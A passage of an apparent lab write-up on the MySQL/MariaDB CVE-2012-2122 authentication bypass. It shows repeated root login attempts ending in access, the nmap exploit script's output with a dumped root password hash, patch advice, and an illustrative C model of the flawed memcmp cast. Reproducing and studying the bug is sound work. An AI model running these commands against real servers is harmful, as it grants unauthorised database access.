ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 2697
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [mysql]>

 4. nmap script (mysql-vuln-cve2012-2122):

root@kali:~# nmap -sV -T4 -p3306  --script=mysql-vuln-cve2012-2122 192.168.118.130

Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-29 16:07 CST
Nmap scan report for bogon (192.168.118.130)
Host is up (0.00033s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.23
| mysql-vuln-cve2012-2122:
| VULNERABLE:
| Authentication bypass in MySQL servers.
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2012-2122
| When a user connects to MariaDB/MySQL, a token (SHA
| over a password and a random scramble string) is calculated and compared
| with the expected value. Because of incorrect casting, it might've
| happened that the token and the expected value were considered equal,
| even if the memcmp() returned a non-zero value. In this case
| MySQL/MariaDB would think that the password is correct, even while it is
| not. Because the protocol uses random strings, the probability of
| hitting this bug is about 1/256.
| Which means, if one knows a user name to connect (and "root" almost
| always exists), she can connect using *any* password by repeating
| connection attempts. ~300 attempts takes only a fraction of second, so
| basically account password protection is as good as nonexistent.
|
| Disclosure date: 2012-06-9
| Extra information:
| Server granted access at iteration #1500
|
| root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
|
| References:
| http://seclists.org/oss-sec/2012/q2/493
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
|_ https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
MAC Address: 00:0C:29:25:90:3B (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds

Add the -d option to see the debug output; the details are as follows:

root@kali:~# nmap -sV -T4 -p3306  -d  --script=mysql-vuln-cve2012-2122 192.168.118.130

Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-29 16:13 CST
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 500, min 100, max 1250
max-scan-delay: TCP 10, UDP 1000, SCTP 10
parallelism: min 0, max 0
max-retries: 6, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------
NSE: Using Lua 5.3.
NSE: Arguments from CLI:
NSE: Loaded 41 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
Initiating ARP Ping Scan at 16:13
Scanning 192.168.118.130 [1 port]
Packet capture filter (device eth0): arp and arp[18:4] = 0x000C29A8 and arp[22:2] = 0x84F5
Completed ARP Ping Scan at 16:13, 0.03s elapsed (1 total hosts)
Overall sending rates: 29.01 packets / s, 1218.42 bytes / s.
mass_rdns: Using DNS server 192.168.118.2
Initiating Parallel DNS resolution of 1 host. at 16:13
mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]
Completed Parallel DNS resolution of 1 host. at 16:13, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:13
Scanning bogon (192.168.118.130) [1 port]
Packet capture filter (device eth0): dst host 192.168.118.128 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 192.168.118.130)))
Discovered open port 3306/tcp on 192.168.118.130
Completed SYN Stealth Scan at 16:13, 0.04s elapsed (1 total ports)
Overall sending rates: 23.44 packets / s, 1031.36 bytes / s.
Initiating Service scan at 16:13
Scanning 1 service on bogon (192.168.118.130)
Completed Service scan at 16:13, 0.00s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.118.130.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 16:13
NSE: Starting mysql-vuln-cve2012-2122 against 192.168.118.130:3306.
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #1
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #2
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #3
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #4
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #5
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #6
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #7
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #8
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #9
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #10
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #11
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #12
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #13
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #14
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #15
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #16
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #17
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #18
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #19
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #20
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #21
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #22
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #23
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #24
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #25
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #26
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #27
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #28
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #29
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #30
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #31
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #32
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #33
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #34
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #35
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #36
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #37
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #38
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #39
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #40
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #41
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #42
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #43
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #44
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #45
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #46
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #47
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #48
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #49
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #50
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #51
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #52
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #53
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #54
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #55
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #56
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #57
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #58
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #59
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #60
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #61
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #62
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #63
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #64
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #65
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #66
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #67
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #68
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #69
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #70
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #71
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #72
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #73
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #74
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #75
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #76
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #77
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #78
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #79
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #80
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #81
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #82
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #83
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #84
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #85
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #86
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #87
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #88
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #89
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #90
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #91
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #92
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #93
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #94
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #95
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #96
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #97
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #98
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #99
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #100
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #101
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #102
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #103
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #104
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #105
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #106
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #107
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #108
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #109
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #110
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #111
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #112
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #113
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #114
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #115
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #116
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #117
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #118
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #119
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #120
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #121
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #122
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #123
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #124
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #125
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #126
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #127
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #128
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #129
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #130
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #131
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #132
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #133
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #134
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #135
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #136
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #137
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #138
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #139
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #140
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #141
NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #142
NSE: Finished mysql-vuln-cve2012-2122 against 192.168.118.130:3306.
Completed NSE at 16:13, 0.42s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
Nmap scan report for bogon (192.168.118.130)
Host is up, received arp-response (0.00068s latency).
Scanned at 2018-08-29 16:13:26 CST for 1s
PORT STATE SERVICE REASON VERSION
3306/tcp open mysql syn-ack ttl 63 MySQL 5.5.23
| mysql-vuln-cve2012-2122:
| VULNERABLE:
| Authentication bypass in MySQL servers.
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2012-2122
| When a user connects to MariaDB/MySQL, a token (SHA
| over a password and a random scramble string) is calculated and compared
| with the expected value. Because of incorrect casting, it might've
| happened that the token and the expected value were considered equal,
| even if the memcmp() returned a non-zero value. In this case
| MySQL/MariaDB would think that the password is correct, even while it is
| not. Because the protocol uses random strings, the probability of
| hitting this bug is about 1/256.
| Which means, if one knows a user name to connect (and "root" almost
| always exists), she can connect using *any* password by repeating
| connection attempts. ~300 attempts takes only a fraction of second, so
| basically account password protection is as good as nonexistent.
|
| Disclosure date: 2012-06-9
| Extra information:
| Server granted access at iteration #1500
|
| root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
|
| References:
| http://seclists.org/oss-sec/2012/q2/493
| https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
MAC Address: 00:0C:29:25:90:3B (VMware)
Final times for host: srtt: 677 rttvar: 3967 to: 100000
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
Read from /usr/bin/../share/nmap: nmap-mac-prefixes nmap-payloads nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.96 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
root@kali:~#

IV. Remediation recommendations

Upgrade to the official patched releases:
MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23
MySQL 5.1.63, 5.5.24, 5.6.6
Sebug's temporary workaround:
Block the MySQL port on the firewall.
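The "incorrect casting" named in the nmap script output above, as an added example that is not MySQL's or this page's own code: a constructed stand-in for an optimized memcmp() whose non-zero results can have a zero low byte, next to the vulnerable shape (the int result narrowed through a one-byte my_bool) and the fixed shape (the result collapsed to 0/1 first, the form of the upstream patch), plus a Monte-Carlo run that reproduces the advisory's roughly 1/256 acceptance rate. wide_memcmp, check_scramble_vulnerable, check_scramble_fixed, demo_false_accept, rng_next and count_false_accepts are constructed names, the word-difference model is an assumption about how an optimized memcmp() behaves, and my_bool is assumed to be a char as in MySQL's headers of that era.

```c
#include <stdint.h>
#include <string.h>

#define SHA1_HASH_SIZE 20
typedef char my_bool;   /* one-byte boolean, as MySQL's my_bool was (assumption) */

/* Constructed stand-in for an optimized memcmp(): returns the 32-bit
 * difference of the first differing 4-byte word.  Non-zero whenever the
 * inputs differ, as memcmp() promises, but its low byte is 0 whenever the
 * two words agree in their low byte.  n must be a multiple of 4. */
static int wide_memcmp(const unsigned char *a, const unsigned char *b, size_t n)
{
    for (size_t i = 0; i + 4 <= n; i += 4) {
        uint32_t wa, wb;
        memcpy(&wa, a + i, 4);
        memcpy(&wb, b + i, 4);
        if (wa != wb)
            return (int)(wa - wb);      /* non-zero, but may be k * 256 */
    }
    return 0;
}

/* Vulnerable shape: the int result goes straight back through a one-byte
 * my_bool, so only its low byte survives.  0 means "password matches". */
static my_bool check_scramble_vulnerable(const unsigned char *want, const unsigned char *got)
{
    return wide_memcmp(want, got, SHA1_HASH_SIZE);
}

/* Fixed shape (the upstream patch wraps memcmp() in test(), i.e. != 0):
 * collapse the result to exactly 0 or 1 before it is narrowed. */
static my_bool check_scramble_fixed(const unsigned char *want, const unsigned char *got)
{
    return wide_memcmp(want, got, SHA1_HASH_SIZE) != 0;
}

/* Two constructed tokens that differ only in byte 1: the word difference is
 * 0x100 (0x10000 big-endian), low byte 0.  Returns 1 when the vulnerable
 * check accepts the mismatch while the fixed check rejects it. */
int demo_false_accept(void)
{
    unsigned char want[SHA1_HASH_SIZE] = {0}, got[SHA1_HASH_SIZE] = {0};
    got[1] = 1;
    return check_scramble_vulnerable(want, got) == 0 &&
           check_scramble_fixed(want, got) != 0;
}
static uint64_t rng_next(uint64_t *s)   /* xorshift64*: reproducible stream */
{
    *s ^= *s >> 12; *s ^= *s << 25; *s ^= *s >> 27;
    return *s * 2685821657736338717ULL;
}

/* Monte-Carlo check of the advisory's "about 1/256": counts how many
 * random wrong tokens the vulnerable check accepts (about trials / 256). */
long count_false_accepts(uint64_t seed, long trials)
{
    unsigned char want[SHA1_HASH_SIZE], got[SHA1_HASH_SIZE];
    long accepted = 0;
    for (long t = 0; t < trials; t++) {
        for (int i = 0; i < SHA1_HASH_SIZE; i++) {
            want[i] = (unsigned char)(rng_next(&seed) >> 56);
            got[i] = (unsigned char)(rng_next(&seed) >> 56);
        }
        if (memcmp(want, got, SHA1_HASH_SIZE) != 0 &&
            check_scramble_vulnerable(want, got) == 0)
            accepted++;
    }
    return accepted;
}
```

With 100000 random wrong tokens the vulnerable check accepts close to 390 of them, which is the "one in about 256 attempts" the advisory and both scanners rely on.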

References:

http://www.freebuf.com/vuls/3815.html

http://blog.51cto.com/linuxgeek/998210

https://www.exploit-db.com/exploits/19092/

https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122

https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/

Next:

1. Study the MySQL source code (http://blog.51cto.com/linuxgeek/998210) for further learning

2. Analyze the nmap and metasploit scripts to improve script-writing skills

3. Reproduce the vulnerable environment: I have downloaded the corresponding vulnerable MySQL version from the official site and installed it on Windows, but have not yet managed to reproduce the bug!
